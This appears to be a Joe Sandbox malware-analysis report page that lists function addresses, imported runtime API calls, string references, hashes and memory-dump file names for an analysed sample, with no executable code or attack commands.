String ID: +-' 0#$aAeEfFgGcCdiouxXnpsS
API String ID: 2830005266-3207406329
Opcode ID: d7300132deb12f4cace1033dc0d859637d9c36d6b73345cff19ea08ae51e4212
Instruction ID: bc6b9101a660b6aa67efebc5c15dd50f5a904b6eac94073876a350243f2efae9
Opcode Fuzzy Hash: d7300132deb12f4cace1033dc0d859637d9c36d6b73345cff19ea08ae51e4212
Instruction Fuzzy Hash: 1AA19F71F056698FDB20CF65D4803AEBBB2AF55300F98815FC841AB345EB78AD85CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00428977 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 230stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00428996
strchr.MSVCRT ref: 004289EF
strchr.MSVCRT ref: 00428B01

Strings

aAeEfFgGcCdiouxXnpsS, xrefs: 004289DF, 004289F8, 00428B8B, 00428BA6
+-' 0#, xrefs: 00428988, 00428AF6

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strchr
String ID: +-' 0#$aAeEfFgGcCdiouxXnpsS
API String ID: 2830005266-3207406329
Opcode ID: 80be6ed2b247fc6aa958efe24c605b6e1564206ec3f311163d7e29e788e1bb8b
Instruction ID: 4e51974ce621760538bc0ca187597a70773a342d4fe7da1d9ff65cf1dc884b47
Opcode Fuzzy Hash: 80be6ed2b247fc6aa958efe24c605b6e1564206ec3f311163d7e29e788e1bb8b
Instruction Fuzzy Hash: 6391BF71E056698FDB20CF64D8803AEBBB2BF55300F99815FC841AB345EB78AD45CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00498C30 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00498C43

Part of subcall function 004979A0: memmove.MSVCRT ref: 00497A23
Part of subcall function 004979A0: memcpy.MSVCRT ref: 00497A50

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00498C85, 00498CE7, 00498D4C, 00498DC3, 00498DDF, 00498E3A
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00498E9F
basic_string::insert, xrefs: 00498DBB, 00498E32
basic_string::replace, xrefs: 00498E97
basic_string::replace, xrefs: 00498C7D, 00498CDF, 00498D44, 00498DD7

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: memcpymemmovestrlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace$basic_string::replace
API String ID: 1940570482-3350440205
Opcode ID: 3b60b95ac3671d4db12fe4db912efa9bd07c043d6064dc8c72d94dcee3b8b1f1
Instruction ID: 4fa06bf424d0f7761dc47489ae344db46865d3cd23796855fbb78a578b80090e
Opcode Fuzzy Hash: 3b60b95ac3671d4db12fe4db912efa9bd07c043d6064dc8c72d94dcee3b8b1f1
Instruction Fuzzy Hash: 6361EFB5909700AFC300EF2AC68451BFBE1BFD9758F54C96EE48887315E3B998408F96

Uniqueness

Uniqueness Score: -1.00%

Function 00424219 Relevance: 9.2, APIs: 6, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 004242CE
memcpy.MSVCRT ref: 00424369
strlen.MSVCRT ref: 00424371
_strdup.MSVCRT ref: 004243BC
strcoll.MSVCRT ref: 00424403
_stricoll.MSVCRT ref: 00424425
malloc.MSVCRT ref: 00424446
free.MSVCRT ref: 0042478A
malloc.MSVCRT ref: 004248AC

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: mallocstrlen$_strdup_stricollfreememcpystrcoll
String ID:
API String ID: 248952651-0
Opcode ID: 966c38e30a8266e7a15b25d909a2098b35307171b87f0032016af08328d1d9d3
Instruction ID: b846c7f1aefb0f42753918717df36a0d57491ac51fed4f3b91571c0f2d771136
Opcode Fuzzy Hash: 966c38e30a8266e7a15b25d909a2098b35307171b87f0032016af08328d1d9d3
Instruction Fuzzy Hash: B8618E75F047658FDB10DFA9E4807AEBBF1EF84344F88846AE854AB341E7789802CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004A4850 Relevance: 9.1, APIs: 6, Instructions: 80stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 004A486A
strlen.MSVCRT ref: 004A4874
memcpy.MSVCRT ref: 004A4891
setlocale.MSVCRT ref: 004A48A5
strtod.MSVCRT ref: 004A48B9
setlocale.MSVCRT ref: 004A48FD

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: setlocale$memcpystrlenstrtod
String ID:
API String ID: 3458007262-0
Opcode ID: 65474e35444a011fd34000590d1a63ea5043f9e79308656599207dac1c2ade2e
Instruction ID: 1c2bad1b94329b6f78f23706997d3ddad71e78b355f4a62df5b7659d4da48e6e
Opcode Fuzzy Hash: 65474e35444a011fd34000590d1a63ea5043f9e79308656599207dac1c2ade2e
Instruction Fuzzy Hash: DD216BB09083099BC301BF25EA8426FBFE4FB86780F11885EE5C447250D7B98864CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00432020 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00432038
strlen.MSVCRT ref: 00432042
memcpy.MSVCRT ref: 0043205F
setlocale.MSVCRT ref: 00432072
wcsftime.MSVCRT ref: 00432096
setlocale.MSVCRT ref: 004320A8

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: d165b16b7716d620a5fe55e66a920d5a5d3f47c5666cc8666bf7f609ffb20fe2
Instruction ID: af96c57fb177647cd4f4d1e365a1bd8b3c8703e82e9dbb9d54966056e228c1a1
Opcode Fuzzy Hash: d165b16b7716d620a5fe55e66a920d5a5d3f47c5666cc8666bf7f609ffb20fe2
Instruction Fuzzy Hash: 3811DAB06093149FC340EF69D49562EBBE4FF98354F85882EF5C887311E77898508B96

Uniqueness

Uniqueness Score: -1.00%

Function 00422CA0 Relevance: 9.0, APIs: 6, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,?,?,?,00422DD1,?,?,?,?,?,?,?,0042376B), ref: 00422CC7
InterlockedExchange.KERNEL32 ref: 00422CF2
InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,00422DD1,?,?,?,?,?,?,?,0042376B), ref: 00422D05
InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00422DD1,?,?,?,?,?,?,?), ref: 00422D14
atexit.MSVCRT ref: 00422D23
EnterCriticalSection.KERNEL32(?,?,?,?,?,00422DD1,?,?,?,?,?,?,?,0042376B), ref: 00422D3F

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$EnterExchangeInterlockedSleepatexit
String ID:
API String ID: 3593181116-0
Opcode ID: d5da97cac5d62e09ca2109e73e77cb340eeb123978251ad32170d1e11d63efa4
Instruction ID: 4246d6dec22cea3f566340ca8ba8198b9e831bd7236040a6f23578a65037808b
Opcode Fuzzy Hash: d5da97cac5d62e09ca2109e73e77cb340eeb123978251ad32170d1e11d63efa4
Instruction Fuzzy Hash: CA0152B1A0025066DB10BF75B68631E77E4AB50304FD0885ED88187311E3BDD598DB97

Uniqueness

Uniqueness Score: -1.00%

Function 00431D70 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00431D88
strlen.MSVCRT ref: 00431D92
memcpy.MSVCRT ref: 00431DAF
setlocale.MSVCRT ref: 00431DC2
strftime.MSVCRT ref: 00431DE6
setlocale.MSVCRT ref: 00431DF8

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 8fa593438f8e8d897fecba948b0dc367adec6f6752f4cefbc76b732eb8b13124
Instruction ID: c1bdc23a1daffd0196a15bd2b95d904e3f24811b3d8180de7858483769f63ada
Opcode Fuzzy Hash: 8fa593438f8e8d897fecba948b0dc367adec6f6752f4cefbc76b732eb8b13124
Instruction Fuzzy Hash: B911DAB05093149FC340AF69D49572EBBE4EF94754F85882EF8C887312E77898508B96

Uniqueness

Uniqueness Score: -1.00%

Function 00425619 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00425652
strchr.MSVCRT ref: 00425662
atoi.MSVCRT ref: 00425679

Strings

HjS, xrefs: 004256D7
., xrefs: 00425657

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: atoisetlocalestrchr
String ID: .$HjS
API String ID: 1223908000-2222588170
Opcode ID: edb2d7948e24fc1f6e506824477d8eff3d8b2a48c2584c43f126f16e0f8f7297
Instruction ID: c79a946b14a03023961b44a6f7c9af25e63b0e159c36ce15e6971a1b826fbf49
Opcode Fuzzy Hash: edb2d7948e24fc1f6e506824477d8eff3d8b2a48c2584c43f126f16e0f8f7297
Instruction Fuzzy Hash: 3241FB75B087158FC720DF69E58422BFBE4EF88754F85492EE88997310E778D940CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0042571C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00425652
strchr.MSVCRT ref: 00425662
atoi.MSVCRT ref: 00425679

Strings

HjS, xrefs: 004256D7
., xrefs: 00425657

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: atoisetlocalestrchr
String ID: .$HjS
API String ID: 1223908000-2222588170
Opcode ID: b54ed84dc644fc6584163b70df6409e318a51c99a9f79427618ac1bac7903622
Instruction ID: 1d7878d1f4fea1628b51eeaf914bc65352a92ba84608e72778d9d5e62288f4ed
Opcode Fuzzy Hash: b54ed84dc644fc6584163b70df6409e318a51c99a9f79427618ac1bac7903622
Instruction Fuzzy Hash: E521EDB5B09B208FD7109F69E54432BBBE0AF88754F85496EE88C97310E778D9448B4A

Uniqueness

Uniqueness Score: -1.00%

Function 00425580 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 004255AA
strchr.MSVCRT ref: 004255BA
atoi.MSVCRT ref: 004255CD

Strings

., xrefs: 004255AF
LjS, xrefs: 00425604

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: atoisetlocalestrchr
String ID: .$LjS
API String ID: 1223908000-2205395414
Opcode ID: 9898720a68c0f99282f3714e232d99fea6ae89af361e95dc178a52f4f67550ab
Instruction ID: 440cb56d58dc8dc7cb117c1615c49affba13da5796060876b77c4cbd66912d92
Opcode Fuzzy Hash: 9898720a68c0f99282f3714e232d99fea6ae89af361e95dc178a52f4f67550ab
Instruction Fuzzy Hash: 9E012DB56097119BC700DF29E48422BBBF1FF88304F94C82EF88887314D739D8409B86

Uniqueness

Uniqueness Score: -1.00%

Function 00425AB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00425AD3
strchr.MSVCRT ref: 00425AE3
atoi.MSVCRT ref: 00425AF6
WideCharToMultiByte.KERNEL32 ref: 00425B36

Strings

., xrefs: 00425AD8

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWideatoisetlocalestrchr
String ID: .
API String ID: 130985476-248832578
Opcode ID: 8470c91bf611325d456b93b0d08867bc75d6a8a986dcd131119e4a40198f65e4
Instruction ID: d75f6852ea44b34df3bd5b787cd78d738038b0cdd7cee8078f4aed3b4b1308d5
Opcode Fuzzy Hash: 8470c91bf611325d456b93b0d08867bc75d6a8a986dcd131119e4a40198f65e4
Instruction Fuzzy Hash: DB11B7746087118AD304DF25D05536FBBE0AF84348F44CE1EE8985B345E7B9D6499B8A

Uniqueness

Uniqueness Score: -1.00%

Function 0042578C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 004257B1
strchr.MSVCRT ref: 004257C1
atoi.MSVCRT ref: 004257D4

Strings

DjS, xrefs: 00425810
., xrefs: 004257B6

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: atoisetlocalestrchr
String ID: .$DjS
API String ID: 1223908000-2371942510
Opcode ID: f46dbfa690a2dc64a91e9e477108c7824e5db6ea1fc0aece6c9b971c53554f3a
Instruction ID: f75815338fe10c4c7cc8f04af677f882ebb8df9dc164edd718dc47f4e9c7e594
Opcode Fuzzy Hash: f46dbfa690a2dc64a91e9e477108c7824e5db6ea1fc0aece6c9b971c53554f3a
Instruction Fuzzy Hash: 5D01C8B9A08711CBC700EF65D58562BBBE1FF88304F94C82EF98897714E779D9409B46

Uniqueness

Uniqueness Score: -1.00%

Function 00421299 Relevance: 7.9, APIs: 2, Strings: 3, Instructions: 393COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00421895
memcpy.MSVCRT ref: 004218D0

Strings

5, xrefs: 004212A2
, xrefs: 004216CD
!, xrefs: 004216BA

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: $!$5
API String ID: 3510742995-3060263202
Opcode ID: f2b97a2701478ce56a61db82575566f566d1f2148a005c697a15282f6738b689
Instruction ID: 20920d0e4a8921cc3ae8afa6c78f4da12b63ce0212efb5d859d7e34fed4a233c
Opcode Fuzzy Hash: f2b97a2701478ce56a61db82575566f566d1f2148a005c697a15282f6738b689
Instruction Fuzzy Hash: 67020571A087619FC760DF29D584A5FFBE1BF94344F85892EE88887311DB78E844CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00424757 Relevance: 7.6, APIs: 5, Instructions: 116stringCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00424369
strlen.MSVCRT ref: 00424371
_strdup.MSVCRT ref: 004243BC
_stricoll.MSVCRT ref: 00424425

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _strdup_stricollmemcpystrlen
String ID:
API String ID: 2607129539-0
Opcode ID: 203c2f2d3a1e24ad699b36105168fff2db179754a979a439176aca56ac8a3696
Instruction ID: fafaf6e5e86e416a4621a6a54d686fb4552f15e9b4b6e5d8ece87a94f1513c1a
Opcode Fuzzy Hash: 203c2f2d3a1e24ad699b36105168fff2db179754a979a439176aca56ac8a3696
Instruction Fuzzy Hash: 7A418975B046258FEB10EFA5E48076EBBE1EF94344F84846EE8559B302E778E801CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004203B7 Relevance: 7.6, APIs: 5, Instructions: 101synchronizationCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32 ref: 004203ED
InterlockedDecrement.KERNEL32 ref: 00420517
WaitForSingleObject.KERNEL32 ref: 004205DC
InterlockedDecrement.KERNEL32 ref: 004205F3

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

